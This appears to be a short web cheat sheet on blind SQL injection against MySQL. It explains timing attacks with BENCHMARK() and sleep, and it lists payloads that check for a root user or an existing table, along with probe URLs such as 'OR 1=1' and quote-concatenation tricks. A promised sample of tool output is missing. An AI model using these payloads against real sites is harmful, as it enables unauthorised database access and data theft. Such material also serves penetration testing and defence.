Table of Contents

Hacking - SQL Injection - MySQL - Blind SQL Injections

About Blind SQL Injections

In a quite good production application generally you can not see error responses on the page, so you can not extract data through Union attacks or error based attacks. You have to do use Blind SQL Injections attacks to extract data. There are two kind of Blind Sql Injections.

In normal blinds you can use if statements or abuse WHERE query in injection (generally easier).

In totally blinds you need to use some waiting functions and analyze response times. For this you can use BENCHMARK() and sleep(10) in MySQL.

Real and a bit Complex Blind SQL Injection Attack Sample

This output taken from a real private Blind SQL Injection tool while exploiting SQL Server back ended application and enumerating table names.


Making Databases Wait / Sleep For Blind SQL Injection Attacks

Use this if it's really blind, otherwise just use 1/0 style errors to identify difference.

Be careful while using times more than 20-30 seconds; database API connection or script can be timeout.

BENCHMARK()

Basically, we are abusing this command to make MySQL wait a bit. Be careful you will consume web servers limit so fast!

BENCHMARK(howmanytimes, do this)

Are we root?

IF EXISTS (SELECT * FROM users WHERE username = 'root') BENCHMARK(1000000000,MD5(1))

Check Table exist in MySQL

IF (SELECT * FROM login) BENCHMARK(1000000,MD5(1))

Clear SQL Injection Tests

These tests are simply good for blind sql injection and silent attacks.

product.asp?id=4
  product.asp?id=5-1
  product.asp?id=4 OR 1=1 
 
product.asp?name=Book
  product.asp?name=Bo'%2b'ok
  product.asp?name=Bo' || 'ok 
  product.asp?name=Book' OR 'x'='x